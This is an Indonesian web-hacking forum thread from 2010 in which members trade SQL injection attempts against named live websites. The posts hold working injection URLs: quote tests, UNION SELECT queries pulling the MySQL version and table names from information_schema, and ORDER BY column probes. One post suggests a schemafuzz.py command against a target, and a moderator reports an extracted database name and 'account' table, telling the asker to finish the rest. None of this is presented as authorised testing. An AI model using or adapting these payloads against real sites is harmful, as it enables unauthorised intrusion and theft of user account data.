[Bug] SQL injection pada News Read ID (read.php?)

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by shinichi81 » Mon May 31, 2010 10:25 am

boleh disikat nih bos poni..........
............make a wish............

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by peniru » Mon May 31, 2010 4:02 pm

shinichi81 wrote:boleh disikat nih bos poni..........
:love: :love:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by cyber_criminal » Mon May 31, 2010 4:53 pm

@om poni : om saya nyoba cek sqli di site ini :

Code: Select all

http://www.wellerpools.com/news-read.php?id=16'
trus pas saya cek versi mysqlnya ternyata versi 4,

Code: Select all

http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,version%28%29,3,4,5,6,7,8,9,10
saya coba cek isi tablenya,

Code: Select all

http://www.wellerpools.com/news-read.php?id=-16%20union%20select%20all%201,group_concat%28table_name%29,3,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database%28%29--
eh malah keluar pesan, kayak gini :

Code: Select all

SELECT * FROM news WHERE news_id=-16 union select all 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
SELECT command denied to user 'main_wellerpools'@'72.167.232.226' for table 'tables'
apa yg mesti saya lakukan mas bila menghadapi hal seperti ini ? mohon pencerahannya
:kaca: :kaca: :kaca:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by cyber_criminal » Mon May 31, 2010 5:00 pm

@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132'
pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000
bingung saya mas
:pusing: :pusing: :pusing:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by peniru » Mon May 31, 2010 5:27 pm

cyber_criminal wrote:@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132'
pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000
bingung saya mas
:pusing: :pusing: :pusing:
kk coba pake schemafuzz.py untuk find jumlah columnnya.

Code: Select all

./schemafuzz.py --findcol -u "http://campus.sanook.com/inlove/read.php?id=132"
moga membantu :maaf: :maaf:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by cyber_criminal » Mon May 31, 2010 5:53 pm

cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by poni » Mon May 31, 2010 6:01 pm

cyber_criminal wrote:@om poni : tambahan satu lagi mas, saya mau cek bug sqlinya di site ini :

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132'
pas saya masukin command order by, situsnya ngak nampilin error sedikitpun, kira2 itu masalahnya apa ya mas ?
saya coba pake command order by 1000000, tetapi tidak ada error sedikitpun

Code: Select all

http://campus.sanook.com/inlove/read.php?id=132%20order%20by%201000000
bingung saya mas
:pusing: :pusing: :pusing:
Database : learntolove
Table : account

sisanya lanjutkan sendiri
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by cyber_criminal » Mon May 31, 2010 6:07 pm

ok makasih om poni
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
x3nophobi4
Posts: 8
Joined: Fri Jun 04, 2010 4:18 pm
Location: [ Banten NKRI ]
Contact:

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by x3nophobi4 » Fri Jun 04, 2010 4:32 pm

Mantep....dah...nyoba ah... :malumalu:
-- Brigade @l Bantani --

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: [Bug] SQL injection pada News Read ID (read.php?)

Post by shinichi81 » Fri Jun 04, 2010 5:53 pm

cyber_criminal wrote:cara make schemafuzzy.py nya mcam mana om peniru ?
:circle: :circle: :circle:
pertama-tama instal dulu phyton,abis itu cari cmd...baru abis itu panggil tuh schemafuzzy.py :tapa: :tapa: :tapa:
............make a wish............

Post Reply

Return to “Web Hacking”